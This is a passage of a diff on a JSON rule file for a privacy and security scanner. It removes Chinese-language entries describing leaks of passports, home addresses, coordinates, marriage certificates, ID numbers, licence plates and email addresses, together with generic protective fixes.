"\u52a0\u5f3a\u5bf9\u7528\u6237\u4e2a\u4eba\u4fe1\u606f\u7684\u4fdd\u62a4\uff0c\u91c7\u53d6\u52a0\u5bc6\u3001\u8eab\u4efd\u9a8c\u8bc1\u3001\u6570\u636e\u6700\u5c0f\u5316\u7b49\u6280\u672f\u624b\u6bb5\uff0c\u786e\u4fdd\u7528\u6237\u6570\u636e\u7684\u5b89\u5168\u6027\u3002\n\u5efa\u7acb\u5b89\u5168\u6f0f\u6d1e\u62a5\u544a\u548c\u5e94\u6025\u54cd\u5e94\u673a\u5236\uff0c\u4ee5\u4fbf\u7528\u6237\u548c\u76f8\u5173\u65b9\u9762\u80fd\u591f\u53ca\u65f6\u53d1\u73b0\u548c\u5904\u7406\u5b89\u5168\u6f0f\u6d1e\u3002", - "vul_name": "\u62a4\u7167\u6cc4\u9732", - "vul_name_en": null, - "vul_name_zh": "\u62a4\u7167\u6cc4\u9732", - "vul_type": "\u62a4\u7167\u6cc4\u9732" - }, - { - "level": 1, - "state": "enable", - "system_type": 1, - "user": 1, - "vul_desc": "\u5bb6\u5ead\u5730\u5740\u4fe1\u606f\u6cc4\u9732\u662f\u6307\u4e2a\u4eba\u6216\u5bb6\u5ead\u7684\u4f4f\u5740\u5728\u672a\u7ecf\u6388\u6743\u7684\u60c5\u51b5\u4e0b\u88ab\u516c\u5f00\u6216\u6cc4\u9732\u7ed9\u7b2c\u4e09\u65b9\uff0c\u53ef\u80fd\u5bfc\u81f4\u4f4f\u6237\u7684\u9690\u79c1\u53d7\u5230\u4fb5\u72af\u548c\u5b89\u5168\u98ce\u9669\u3002\u8fd9\u79cd\u6cc4\u9732\u53ef\u80fd\u88ab\u4e0d\u6cd5\u5206\u5b50\u6216\u6076\u610f\u4e2a\u4f53\u6ee5\u7528\uff0c\u7528\u4e8e\u5b9e\u65bd\u5165\u5ba4\u76d7\u7a83\u3001\u9a9a\u6270\u3001\u7f51\u7edc\u6b3a\u8bc8\u6216\u5176\u4ed6\u4e0d\u5f53\u884c\u4e3a\uff0c\u5bf9\u4f4f\u6237\u7684\u5b89\u5168\u548c\u9690\u79c1\u6784\u6210\u6f5c\u5728\u5a01\u80c1\u3002\u56e0\u6b64\uff0c\u4fdd\u62a4\u5bb6\u5ead\u5730\u5740\u7684\u9690\u79c1\u81f3\u5173\u91cd\u8981\uff0c\u4ee5\u786e\u4fdd\u5bb6\u5ead\u6210\u5458\u7684\u5b89\u5168\u548c\u5b89\u5b81\u3002", - "vul_desc_en": null, - "vul_desc_zh": "\u5bb6\u5ead\u5730\u5740\u4fe1\u606f\u6cc4\u9732\u662f\u6307\u4e2a\u4eba\u6216\u5bb6\u5ead\u7684\u4f4f\u5740\u5728\u672a\u7ecf\u6388\u6743\u7684\u60c5\u51b5\u4e0b\u88ab\u516c\u5f00\u6216\u6cc4\u9732\u7ed9\u7b2c\u4e09\u65b9\uff0c\u53ef\u80fd\u5bfc\u81f4\u4f4f\u6237\u7684\u9690\u79c1\u53d7\u5230\u4fb5\u72af\u548c\u5b89\u5168\u98ce\u9669\u3002\u8fd9\u79cd\u6cc4\u9732\u53ef\u80fd\u88ab\u4e0d\u6cd5\u5206\u5b50\u6216\u6076\u610f\u4e2a\u4f53\u6ee5\u7528\uff0c\u7528\u4e8e\u5b9e\u65bd\u5165\u5ba4\u76d7\u7a83\u3001\u9a9a\u6270\u3001\u7f51\u7edc\u6b3a\u8bc8\u6216\u5176\u4ed6\u4e0d\u5f53\u884c\u4e3a\uff0c\u5bf9\u4f4f\u6237\u7684\u5b89\u5168\u548c\u9690\u79c1\u6784\u6210\u6f5c\u5728\u5a01\u80c1\u3002\u56e0\u6b64\uff0c\u4fdd\u62a4\u5bb6\u5ead\u5730\u5740\u7684\u9690\u79c1\u81f3\u5173\u91cd\u8981\uff0c\u4ee5\u786e\u4fdd\u5bb6\u5ead\u6210\u5458\u7684\u5b89\u5168\u548c\u5b89\u5b81\u3002", - "vul_fix": "\u52a0\u5f3a\u5bf9\u7528\u6237\u4e2a\u4eba\u4fe1\u606f\u7684\u4fdd\u62a4\uff0c\u91c7\u53d6\u52a0\u5bc6\u3001\u8eab\u4efd\u9a8c\u8bc1\u3001\u6570\u636e\u6700\u5c0f\u5316\u7b49\u6280\u672f\u624b\u6bb5\uff0c\u786e\u4fdd\u7528\u6237\u6570\u636e\u7684\u5b89\u5168\u6027\u3002\n\u5efa\u7acb\u5b89\u5168\u6f0f\u6d1e\u62a5\u544a\u548c\u5e94\u6025\u54cd\u5e94\u673a\u5236\uff0c\u4ee5\u4fbf\u7528\u6237\u548c\u76f8\u5173\u65b9\u9762\u80fd\u591f\u53ca\u65f6\u53d1\u73b0\u548c\u5904\u7406\u5b89\u5168\u6f0f\u6d1e\u3002", - "vul_fix_en": null, - "vul_fix_zh": "\u52a0\u5f3a\u5bf9\u7528\u6237\u4e2a\u4eba\u4fe1\u606f\u7684\u4fdd\u62a4\uff0c\u91c7\u53d6\u52a0\u5bc6\u3001\u8eab\u4efd\u9a8c\u8bc1\u3001\u6570\u636e\u6700\u5c0f\u5316\u7b49\u6280\u672f\u624b\u6bb5\uff0c\u786e\u4fdd\u7528\u6237\u6570\u636e\u7684\u5b89\u5168\u6027\u3002\n\u5efa\u7acb\u5b89\u5168\u6f0f\u6d1e\u62a5\u544a\u548c\u5e94\u6025\u54cd\u5e94\u673a\u5236\uff0c\u4ee5\u4fbf\u7528\u6237\u548c\u76f8\u5173\u65b9\u9762\u80fd\u591f\u53ca\u65f6\u53d1\u73b0\u548c\u5904\u7406\u5b89\u5168\u6f0f\u6d1e\u3002", - "vul_name": "\u7528\u6237\u5730\u5740\u6cc4\u9732", - "vul_name_en": null, - "vul_name_zh": "\u7528\u6237\u5730\u5740\u6cc4\u9732", - "vul_type": "\u7528\u6237\u5730\u5740\u6cc4\u9732" - }, { "level": 5, "state": "enable", @@ -703,38 +639,6 @@ "vul_name_zh": "\u786c\u7f16\u7801", "vul_type": "\u786c\u7f16\u7801" }, - { - "level": 5, - "state": "enable", - "system_type": 1, - "user": 1, - "vul_desc": "\u7ecf\u7eac\u5ea6\u4fe1\u606f\u6cc4\u9732\u662f\u6307\u4e2a\u4eba\u6216\u5730\u70b9\u7684\u7cbe\u786e\u5730\u7406\u4f4d\u7f6e\u5750\u6807\u5728\u672a\u7ecf\u6388\u6743\u7684\u60c5\u51b5\u4e0b\u88ab\u516c\u5f00\u6216\u6cc4\u9732\u7ed9\u7b2c\u4e09\u65b9\uff0c\u53ef\u80fd\u5bfc\u81f4\u9690\u79c1\u66b4\u9732\u3001\u4e2a\u4eba\u5b89\u5168\u53d7\u5a01\u80c1\u3002\u8fd9\u79cd\u6cc4\u9732\u53ef\u80fd\u88ab\u6ee5\u7528\u6765\u8ddf\u8e2a\u4e2a\u4eba\u7684\u884c\u52a8\u3001\u66b4\u9732\u4f4f\u6240\u6216\u5de5\u4f5c\u5730\u70b9\u7b49\u654f\u611f\u4fe1\u606f\uff0c\u5bf9\u4e2a\u4eba\u5b89\u5168\u548c\u9690\u79c1\u6784\u6210\u6f5c\u5728\u98ce\u9669\u3002", - "vul_desc_en": null, - "vul_desc_zh": "\u7ecf\u7eac\u5ea6\u4fe1\u606f\u6cc4\u9732\u662f\u6307\u4e2a\u4eba\u6216\u5730\u70b9\u7684\u7cbe\u786e\u5730\u7406\u4f4d\u7f6e\u5750\u6807\u5728\u672a\u7ecf\u6388\u6743\u7684\u60c5\u51b5\u4e0b\u88ab\u516c\u5f00\u6216\u6cc4\u9732\u7ed9\u7b2c\u4e09\u65b9\uff0c\u53ef\u80fd\u5bfc\u81f4\u9690\u79c1\u66b4\u9732\u3001\u4e2a\u4eba\u5b89\u5168\u53d7\u5a01\u80c1\u3002\u8fd9\u79cd\u6cc4\u9732\u53ef\u80fd\u88ab\u6ee5\u7528\u6765\u8ddf\u8e2a\u4e2a\u4eba\u7684\u884c\u52a8\u3001\u66b4\u9732\u4f4f\u6240\u6216\u5de5\u4f5c\u5730\u70b9\u7b49\u654f\u611f\u4fe1\u606f\uff0c\u5bf9\u4e2a\u4eba\u5b89\u5168\u548c\u9690\u79c1\u6784\u6210\u6f5c\u5728\u98ce\u9669\u3002", - "vul_fix": "\u52a0\u5f3a\u5bf9\u7528\u6237\u4e2a\u4eba\u4fe1\u606f\u7684\u4fdd\u62a4\uff0c\u91c7\u53d6\u52a0\u5bc6\u3001\u8eab\u4efd\u9a8c\u8bc1\u3001\u6570\u636e\u6700\u5c0f\u5316\u7b49\u6280\u672f\u624b\u6bb5\uff0c\u786e\u4fdd\u7528\u6237\u6570\u636e\u7684\u5b89\u5168\u6027\u3002\n\u5efa\u7acb\u5b89\u5168\u6f0f\u6d1e\u62a5\u544a\u548c\u5e94\u6025\u54cd\u5e94\u673a\u5236\uff0c\u4ee5\u4fbf\u7528\u6237\u548c\u76f8\u5173\u65b9\u9762\u80fd\u591f\u53ca\u65f6\u53d1\u73b0\u548c\u5904\u7406\u5b89\u5168\u6f0f\u6d1e\u3002", - "vul_fix_en": null, - "vul_fix_zh": "\u52a0\u5f3a\u5bf9\u7528\u6237\u4e2a\u4eba\u4fe1\u606f\u7684\u4fdd\u62a4\uff0c\u91c7\u53d6\u52a0\u5bc6\u3001\u8eab\u4efd\u9a8c\u8bc1\u3001\u6570\u636e\u6700\u5c0f\u5316\u7b49\u6280\u672f\u624b\u6bb5\uff0c\u786e\u4fdd\u7528\u6237\u6570\u636e\u7684\u5b89\u5168\u6027\u3002\n\u5efa\u7acb\u5b89\u5168\u6f0f\u6d1e\u62a5\u544a\u548c\u5e94\u6025\u54cd\u5e94\u673a\u5236\uff0c\u4ee5\u4fbf\u7528\u6237\u548c\u76f8\u5173\u65b9\u9762\u80fd\u591f\u53ca\u65f6\u53d1\u73b0\u548c\u5904\u7406\u5b89\u5168\u6f0f\u6d1e\u3002", - "vul_name": "\u7ecf\u7eac\u5ea6\u4fe1\u606f\u6cc4\u9732", - "vul_name_en": null, - "vul_name_zh": "\u7ecf\u7eac\u5ea6\u4fe1\u606f\u6cc4\u9732", - "vul_type": "\u7ecf\u7eac\u5ea6\u4fe1\u606f\u6cc4\u9732" - }, - { - "level": 2, - "state": "enable", - "system_type": 1, - "user": 1, - "vul_desc": "\u7ed3\u5a5a\u8bc1\u4fe1\u606f\u6cc4\u9732\u662f\u6307\u7ed3\u5a5a\u8bc1\u4e0a\u5305\u542b\u7684\u654f\u611f\u4e2a\u4eba\u4fe1\u606f\u5728\u672a\u7ecf\u6388\u6743\u7684\u60c5\u51b5\u4e0b\u88ab\u516c\u5f00\u6216\u6cc4\u9732\u7ed9\u7b2c\u4e09\u65b9\uff0c\u4ece\u800c\u53ef\u80fd\u5bfc\u81f4\u9690\u79c1\u4fb5\u72af\uff0c\u8eab\u4efd\u76d7\u7a83\uff0c\u793e\u4ea4\u5de5\u7a0b\u653b\u51fb\u7b49\uff0c\u56e0\u6b64\uff0c\u7ed3\u5a5a\u8bc1\u4fe1\u606f\u7684\u6cc4\u9732\u53ef\u80fd\u5bf9\u4e2a\u4eba\u7684\u9690\u79c1\u3001\u91d1\u878d\u5b89\u5168\u548c\u5a5a\u59fb\u5173\u7cfb\u6784\u6210\u4e25\u91cd\u5a01\u80c1\uff0c\u9700\u8981\u91c7\u53d6\u4e25\u683c\u7684\u5b89\u5168\u63aa\u65bd\u6765\u9632\u6b62\u6cc4\u9732\u548c\u6ee5\u7528\u3002\u540c\u65f6\uff0c\u6cd5\u5f8b\u548c\u6cd5\u89c4\u4e5f\u5e94\u5f53\u5236\u5b9a\u4ee5\u4fdd\u62a4\u4e2a\u4eba\u7684\u7ed3\u5a5a\u8bc1\u4fe1\u606f\u514d\u53d7\u4e0d\u5f53\u8bbf\u95ee\u548c\u6ee5\u7528\u3002", - "vul_desc_en": null, - "vul_desc_zh": "\u7ed3\u5a5a\u8bc1\u4fe1\u606f\u6cc4\u9732\u662f\u6307\u7ed3\u5a5a\u8bc1\u4e0a\u5305\u542b\u7684\u654f\u611f\u4e2a\u4eba\u4fe1\u606f\u5728\u672a\u7ecf\u6388\u6743\u7684\u60c5\u51b5\u4e0b\u88ab\u516c\u5f00\u6216\u6cc4\u9732\u7ed9\u7b2c\u4e09\u65b9\uff0c\u4ece\u800c\u53ef\u80fd\u5bfc\u81f4\u9690\u79c1\u4fb5\u72af\uff0c\u8eab\u4efd\u76d7\u7a83\uff0c\u793e\u4ea4\u5de5\u7a0b\u653b\u51fb\u7b49\uff0c\u56e0\u6b64\uff0c\u7ed3\u5a5a\u8bc1\u4fe1\u606f\u7684\u6cc4\u9732\u53ef\u80fd\u5bf9\u4e2a\u4eba\u7684\u9690\u79c1\u3001\u91d1\u878d\u5b89\u5168\u548c\u5a5a\u59fb\u5173\u7cfb\u6784\u6210\u4e25\u91cd\u5a01\u80c1\uff0c\u9700\u8981\u91c7\u53d6\u4e25\u683c\u7684\u5b89\u5168\u63aa\u65bd\u6765\u9632\u6b62\u6cc4\u9732\u548c\u6ee5\u7528\u3002\u540c\u65f6\uff0c\u6cd5\u5f8b\u548c\u6cd5\u89c4\u4e5f\u5e94\u5f53\u5236\u5b9a\u4ee5\u4fdd\u62a4\u4e2a\u4eba\u7684\u7ed3\u5a5a\u8bc1\u4fe1\u606f\u514d\u53d7\u4e0d\u5f53\u8bbf\u95ee\u548c\u6ee5\u7528\u3002", - "vul_fix": "\u52a0\u5f3a\u5bf9\u7528\u6237\u4e2a\u4eba\u4fe1\u606f\u7684\u4fdd\u62a4\uff0c\u91c7\u53d6\u52a0\u5bc6\u3001\u8eab\u4efd\u9a8c\u8bc1\u3001\u6570\u636e\u6700\u5c0f\u5316\u7b49\u6280\u672f\u624b\u6bb5\uff0c\u786e\u4fdd\u7528\u6237\u6570\u636e\u7684\u5b89\u5168\u6027\u3002\n\u5efa\u7acb\u5b89\u5168\u6f0f\u6d1e\u62a5\u544a\u548c\u5e94\u6025\u54cd\u5e94\u673a\u5236\uff0c\u4ee5\u4fbf\u7528\u6237\u548c\u76f8\u5173\u65b9\u9762\u80fd\u591f\u53ca\u65f6\u53d1\u73b0\u548c\u5904\u7406\u5b89\u5168\u6f0f\u6d1e\u3002", - "vul_fix_en": null, - "vul_fix_zh": "\u52a0\u5f3a\u5bf9\u7528\u6237\u4e2a\u4eba\u4fe1\u606f\u7684\u4fdd\u62a4\uff0c\u91c7\u53d6\u52a0\u5bc6\u3001\u8eab\u4efd\u9a8c\u8bc1\u3001\u6570\u636e\u6700\u5c0f\u5316\u7b49\u6280\u672f\u624b\u6bb5\uff0c\u786e\u4fdd\u7528\u6237\u6570\u636e\u7684\u5b89\u5168\u6027\u3002\n\u5efa\u7acb\u5b89\u5168\u6f0f\u6d1e\u62a5\u544a\u548c\u5e94\u6025\u54cd\u5e94\u673a\u5236\uff0c\u4ee5\u4fbf\u7528\u6237\u548c\u76f8\u5173\u65b9\u9762\u80fd\u591f\u53ca\u65f6\u53d1\u73b0\u548c\u5904\u7406\u5b89\u5168\u6f0f\u6d1e\u3002", - "vul_name": "\u7ed3\u5a5a\u8bc1\u6cc4\u9732", - "vul_name_en": null, - "vul_name_zh": "\u7ed3\u5a5a\u8bc1\u6cc4\u9732", - "vul_type": "\u7ed3\u5a5a\u8bc1\u6cc4\u9732" - }, { "level": 1, "state": "enable", @@ -750,53 +654,5 @@ "vul_name_en": null, "vul_name_zh": "\u8eab\u4efd\u8ba4\u8bc1", "vul_type": "\u8eab\u4efd\u8ba4\u8bc1" - }, - { - "level": 1, - "state": "enable", - "system_type": 1, - "user": 1, - "vul_desc": "\u8eab\u4efd\u8bc1\u4fe1\u606f\u6cc4\u9732\u662f\u6307\u4e2a\u4eba\u6216\u7ec4\u7ec7\u7684\u8eab\u4efd\u8bc1\u53f7\u7801\u53ca\u76f8\u5173\u654f\u611f\u4e2a\u4eba\u4fe1\u606f\u5728\u672a\u7ecf\u6388\u6743\u7684\u60c5\u51b5\u4e0b\u88ab\u516c\u5f00\u6216\u6cc4\u9732\u7ed9\u7b2c\u4e09\u65b9\uff0c\u4ece\u800c\u5bfc\u81f4\u4e2a\u4eba\u9690\u79c1\u66b4\u9732\u7684\u4e00\u79cd\u4e25\u91cd\u6f0f\u6d1e\u3002\n\u4e00\u65e6\u8eab\u4efd\u8bc1\u4fe1\u606f\u88ab\u6cc4\u9732\uff0c\u653b\u51fb\u8005\u53ef\u80fd\u4f1a\u6ee5\u7528\u8fd9\u4e9b\u4fe1\u606f\u8fdb\u884c\u5404\u79cd\u6076\u610f\u6d3b\u52a8\uff0c\u5305\u62ec\u8eab\u4efd\u76d7\u7a83\u3001\u6b3a\u8bc8\u3001\u865a\u5047\u8eab\u4efd\u5236\u4f5c\u7b49\u3002\u4f8b\u5982\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u4f7f\u7528\u88ab\u6cc4\u9732\u7684\u8eab\u4efd\u8bc1\u4fe1\u606f\u6765\u5192\u5145\u53d7\u5bb3\u8005\uff0c\u8fdb\u884c\u91d1\u878d\u8bc8\u9a97\u6216\u975e\u6cd5\u8bbf\u95ee\u53d7\u5bb3\u8005\u7684\u4e2a\u4eba\u8d26\u6237\u3002\u6b64\u5916\uff0c\u8fd9\u4e9b\u4fe1\u606f\u8fd8\u53ef\u4ee5\u88ab\u7528\u4e8e\u975e\u6cd5\u8d2d\u4e70\u5546\u54c1\u6216\u670d\u52a1\uff0c\u4ece\u800c\u7ed9\u53d7\u5bb3\u8005\u5e26\u6765\u8d22\u52a1\u635f\u5931\u548c\u6cd5\u5f8b\u95ee\u9898\u3002", - "vul_desc_en": null, - "vul_desc_zh": "\u8eab\u4efd\u8bc1\u4fe1\u606f\u6cc4\u9732\u662f\u6307\u4e2a\u4eba\u6216\u7ec4\u7ec7\u7684\u8eab\u4efd\u8bc1\u53f7\u7801\u53ca\u76f8\u5173\u654f\u611f\u4e2a\u4eba\u4fe1\u606f\u5728\u672a\u7ecf\u6388\u6743\u7684\u60c5\u51b5\u4e0b\u88ab\u516c\u5f00\u6216\u6cc4\u9732\u7ed9\u7b2c\u4e09\u65b9\uff0c\u4ece\u800c\u5bfc\u81f4\u4e2a\u4eba\u9690\u79c1\u66b4\u9732\u7684\u4e00\u79cd\u4e25\u91cd\u6f0f\u6d1e\u3002\n\u4e00\u65e6\u8eab\u4efd\u8bc1\u4fe1\u606f\u88ab\u6cc4\u9732\uff0c\u653b\u51fb\u8005\u53ef\u80fd\u4f1a\u6ee5\u7528\u8fd9\u4e9b\u4fe1\u606f\u8fdb\u884c\u5404\u79cd\u6076\u610f\u6d3b\u52a8\uff0c\u5305\u62ec\u8eab\u4efd\u76d7\u7a83\u3001\u6b3a\u8bc8\u3001\u865a\u5047\u8eab\u4efd\u5236\u4f5c\u7b49\u3002\u4f8b\u5982\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u4f7f\u7528\u88ab\u6cc4\u9732\u7684\u8eab\u4efd\u8bc1\u4fe1\u606f\u6765\u5192\u5145\u53d7\u5bb3\u8005\uff0c\u8fdb\u884c\u91d1\u878d\u8bc8\u9a97\u6216\u975e\u6cd5\u8bbf\u95ee\u53d7\u5bb3\u8005\u7684\u4e2a\u4eba\u8d26\u6237\u3002\u6b64\u5916\uff0c\u8fd9\u4e9b\u4fe1\u606f\u8fd8\u53ef\u4ee5\u88ab\u7528\u4e8e\u975e\u6cd5\u8d2d\u4e70\u5546\u54c1\u6216\u670d\u52a1\uff0c\u4ece\u800c\u7ed9\u53d7\u5bb3\u8005\u5e26\u6765\u8d22\u52a1\u635f\u5931\u548c\u6cd5\u5f8b\u95ee\u9898\u3002", - "vul_fix": "\u52a0\u5f3a\u5bf9\u7528\u6237\u4e2a\u4eba\u4fe1\u606f\u7684\u4fdd\u62a4\uff0c\u91c7\u53d6\u52a0\u5bc6\u3001\u8eab\u4efd\u9a8c\u8bc1\u3001\u6570\u636e\u6700\u5c0f\u5316\u7b49\u6280\u672f\u624b\u6bb5\uff0c\u786e\u4fdd\u7528\u6237\u6570\u636e\u7684\u5b89\u5168\u6027\u3002\n\u5efa\u7acb\u5b89\u5168\u6f0f\u6d1e\u62a5\u544a\u548c\u5e94\u6025\u54cd\u5e94\u673a\u5236\uff0c\u4ee5\u4fbf\u7528\u6237\u548c\u76f8\u5173\u65b9\u9762\u80fd\u591f\u53ca\u65f6\u53d1\u73b0\u548c\u5904\u7406\u5b89\u5168\u6f0f\u6d1e\u3002", - "vul_fix_en": null, - "vul_fix_zh": "\u52a0\u5f3a\u5bf9\u7528\u6237\u4e2a\u4eba\u4fe1\u606f\u7684\u4fdd\u62a4\uff0c\u91c7\u53d6\u52a0\u5bc6\u3001\u8eab\u4efd\u9a8c\u8bc1\u3001\u6570\u636e\u6700\u5c0f\u5316\u7b49\u6280\u672f\u624b\u6bb5\uff0c\u786e\u4fdd\u7528\u6237\u6570\u636e\u7684\u5b89\u5168\u6027\u3002\n\u5efa\u7acb\u5b89\u5168\u6f0f\u6d1e\u62a5\u544a\u548c\u5e94\u6025\u54cd\u5e94\u673a\u5236\uff0c\u4ee5\u4fbf\u7528\u6237\u548c\u76f8\u5173\u65b9\u9762\u80fd\u591f\u53ca\u65f6\u53d1\u73b0\u548c\u5904\u7406\u5b89\u5168\u6f0f\u6d1e\u3002", - "vul_name": "\u8eab\u4efd\u8bc1\u6cc4\u9732", - "vul_name_en": null, - "vul_name_zh": "\u8eab\u4efd\u8bc1\u6cc4\u9732", - "vul_type": "\u8eab\u4efd\u8bc1\u6cc4\u9732" - }, - { - "level": 5, - "state": "enable", - "system_type": 1, - "user": 1, - "vul_desc": "\u8f66\u724c\u53f7\u6cc4\u9732\u662f\u6307\u4e2a\u4eba\u6216\u8f66\u8f86\u6240\u6709\u8005\u7684\u8f66\u724c\u53f7\u7801\u5728\u672a\u7ecf\u6388\u6743\u7684\u60c5\u51b5\u4e0b\u88ab\u516c\u5f00\u6216\u6cc4\u9732\u7ed9\u7b2c\u4e09\u65b9\uff0c\u53ef\u80fd\u5bfc\u81f4\u4e2a\u4eba\u9690\u79c1\u66b4\u9732\u3001\u8f66\u8f86\u88ab\u76d7\u7528\u6216\u6ee5\u7528\u7b49\u98ce\u9669\u3002\u8fd9\u79cd\u6cc4\u9732\u53ef\u80fd\u88ab\u7528\u4e8e\u8ffd\u8e2a\u4e2a\u4eba\u7684\u884c\u52a8\u3001\u5b9e\u65bd\u72af\u7f6a\u6d3b\u52a8\u6216\u8005\u5176\u4ed6\u4e0d\u5f53\u7528\u9014\u3002\u56e0\u6b64\uff0c\u4fdd\u62a4\u8f66\u724c\u53f7\u7684\u9690\u79c1\u5bf9\u4e8e\u8f66\u4e3b\u7684\u5b89\u5168\u548c\u9690\u79c1\u81f3\u5173\u91cd\u8981\u3002", - "vul_desc_en": null, - "vul_desc_zh": "\u8f66\u724c\u53f7\u6cc4\u9732\u662f\u6307\u4e2a\u4eba\u6216\u8f66\u8f86\u6240\u6709\u8005\u7684\u8f66\u724c\u53f7\u7801\u5728\u672a\u7ecf\u6388\u6743\u7684\u60c5\u51b5\u4e0b\u88ab\u516c\u5f00\u6216\u6cc4\u9732\u7ed9\u7b2c\u4e09\u65b9\uff0c\u53ef\u80fd\u5bfc\u81f4\u4e2a\u4eba\u9690\u79c1\u66b4\u9732\u3001\u8f66\u8f86\u88ab\u76d7\u7528\u6216\u6ee5\u7528\u7b49\u98ce\u9669\u3002\u8fd9\u79cd\u6cc4\u9732\u53ef\u80fd\u88ab\u7528\u4e8e\u8ffd\u8e2a\u4e2a\u4eba\u7684\u884c\u52a8\u3001\u5b9e\u65bd\u72af\u7f6a\u6d3b\u52a8\u6216\u8005\u5176\u4ed6\u4e0d\u5f53\u7528\u9014\u3002\u56e0\u6b64\uff0c\u4fdd\u62a4\u8f66\u724c\u53f7\u7684\u9690\u79c1\u5bf9\u4e8e\u8f66\u4e3b\u7684\u5b89\u5168\u548c\u9690\u79c1\u81f3\u5173\u91cd\u8981\u3002", - "vul_fix": "\u52a0\u5f3a\u5bf9\u7528\u6237\u4e2a\u4eba\u4fe1\u606f\u7684\u4fdd\u62a4\uff0c\u91c7\u53d6\u52a0\u5bc6\u3001\u8eab\u4efd\u9a8c\u8bc1\u3001\u6570\u636e\u6700\u5c0f\u5316\u7b49\u6280\u672f\u624b\u6bb5\uff0c\u786e\u4fdd\u7528\u6237\u6570\u636e\u7684\u5b89\u5168\u6027\u3002\n\u5efa\u7acb\u5b89\u5168\u6f0f\u6d1e\u62a5\u544a\u548c\u5e94\u6025\u54cd\u5e94\u673a\u5236\uff0c\u4ee5\u4fbf\u7528\u6237\u548c\u76f8\u5173\u65b9\u9762\u80fd\u591f\u53ca\u65f6\u53d1\u73b0\u548c\u5904\u7406\u5b89\u5168\u6f0f\u6d1e\u3002", - "vul_fix_en": null, - "vul_fix_zh": "\u52a0\u5f3a\u5bf9\u7528\u6237\u4e2a\u4eba\u4fe1\u606f\u7684\u4fdd\u62a4\uff0c\u91c7\u53d6\u52a0\u5bc6\u3001\u8eab\u4efd\u9a8c\u8bc1\u3001\u6570\u636e\u6700\u5c0f\u5316\u7b49\u6280\u672f\u624b\u6bb5\uff0c\u786e\u4fdd\u7528\u6237\u6570\u636e\u7684\u5b89\u5168\u6027\u3002\n\u5efa\u7acb\u5b89\u5168\u6f0f\u6d1e\u62a5\u544a\u548c\u5e94\u6025\u54cd\u5e94\u673a\u5236\uff0c\u4ee5\u4fbf\u7528\u6237\u548c\u76f8\u5173\u65b9\u9762\u80fd\u591f\u53ca\u65f6\u53d1\u73b0\u548c\u5904\u7406\u5b89\u5168\u6f0f\u6d1e\u3002", - "vul_name": "\u8f66\u724c\u53f7\u6cc4\u9732", - "vul_name_en": null, - "vul_name_zh": "\u8f66\u724c\u53f7\u6cc4\u9732", - "vul_type": "\u8f66\u724c\u53f7\u6cc4\u9732" - }, - { - "level": 5, - "state": "enable", - "system_type": 1, - "user": 1, - "vul_desc": "\u90ae\u7bb1\u4fe1\u606f\u6cc4\u9732\u662f\u6307\u4e2a\u4eba\u6216\u7ec4\u7ec7\u7684\u7535\u5b50\u90ae\u4ef6\u5730\u5740\u5728\u672a\u7ecf\u6388\u6743\u7684\u60c5\u51b5\u4e0b\u88ab\u516c\u5f00\u6216\u6cc4\u9732\u7ed9\u7b2c\u4e09\u65b9\uff0c\u53ef\u80fd\u5bfc\u81f4\u5783\u573e\u90ae\u4ef6\u3001\u7f51\u7edc\u9493\u9c7c\u653b\u51fb\u3001\u8eab\u4efd\u76d7\u7a83\u7b49\u7535\u5b50\u90ae\u4ef6\u76f8\u5173\u98ce\u9669\u3002\u8fd9\u79cd\u6cc4\u9732\u53ef\u80fd\u88ab\u6ee5\u7528\u6765\u53d1\u9001\u6076\u610f\u90ae\u4ef6\u3001\u6b3a\u8bc8\u4fe1\u606f\u6216\u7528\u4e8e\u4e0d\u6cd5\u7528\u9014\uff0c\u5bf9\u7535\u5b50\u90ae\u4ef6\u7528\u6237\u7684\u9690\u79c1\u548c\u5b89\u5168\u6784\u6210\u6f5c\u5728\u5a01\u80c1\u3002\u56e0\u6b64\uff0c\u4fdd\u62a4\u7535\u5b50\u90ae\u4ef6\u5730\u5740\u7684\u9690\u79c1\u5bf9\u4e8e\u9632\u8303\u7535\u5b50\u90ae\u4ef6\u76f8\u5173\u98ce\u9669\u81f3\u5173\u91cd\u8981\u3002", - "vul_desc_en": null, - "vul_desc_zh": "\u90ae\u7bb1\u4fe1\u606f\u6cc4\u9732\u662f\u6307\u4e2a\u4eba\u6216\u7ec4\u7ec7\u7684\u7535\u5b50\u90ae\u4ef6\u5730\u5740\u5728\u672a\u7ecf\u6388\u6743\u7684\u60c5\u51b5\u4e0b\u88ab\u516c\u5f00\u6216\u6cc4\u9732\u7ed9\u7b2c\u4e09\u65b9\uff0c\u53ef\u80fd\u5bfc\u81f4\u5783\u573e\u90ae\u4ef6\u3001\u7f51\u7edc\u9493\u9c7c\u653b\u51fb\u3001\u8eab\u4efd\u76d7\u7a83\u7b49\u7535\u5b50\u90ae\u4ef6\u76f8\u5173\u98ce\u9669\u3002\u8fd9\u79cd\u6cc4\u9732\u53ef\u80fd\u88ab\u6ee5\u7528\u6765\u53d1\u9001\u6076\u610f\u90ae\u4ef6\u3001\u6b3a\u8bc8\u4fe1\u606f\u6216\u7528\u4e8e\u4e0d\u6cd5\u7528\u9014\uff0c\u5bf9\u7535\u5b50\u90ae\u4ef6\u7528\u6237\u7684\u9690\u79c1\u548c\u5b89\u5168\u6784\u6210\u6f5c\u5728\u5a01\u80c1\u3002\u56e0\u6b64\uff0c\u4fdd\u62a4\u7535\u5b50\u90ae\u4ef6\u5730\u5740\u7684\u9690\u79c1\u5bf9\u4e8e\u9632\u8303\u7535\u5b50\u90ae\u4ef6\u76f8\u5173\u98ce\u9669\u81f3\u5173\u91cd\u8981\u3002", - "vul_fix": "\u52a0\u5f3a\u5bf9\u7528\u6237\u4e2a\u4eba\u4fe1\u606f\u7684\u4fdd\u62a4\uff0c\u91c7\u53d6\u52a0\u5bc6\u3001\u8eab\u4efd\u9a8c\u8bc1\u3001\u6570\u636e\u6700\u5c0f\u5316\u7b49\u6280\u672f\u624b\u6bb5\uff0c\u786e\u4fdd\u7528\u6237\u6570\u636e\u7684\u5b89\u5168\u6027\u3002\n\u5efa\u7acb\u5b89\u5168\u6f0f\u6d1e\u62a5\u544a\u548c\u5e94\u6025\u54cd\u5e94\u673a\u5236\uff0c\u4ee5\u4fbf\u7528\u6237\u548c\u76f8\u5173\u65b9\u9762\u80fd\u591f\u53ca\u65f6\u53d1\u73b0\u548c\u5904\u7406\u5b89\u5168\u6f0f\u6d1e\u3002", - "vul_fix_en": null, - "vul_fix_zh": 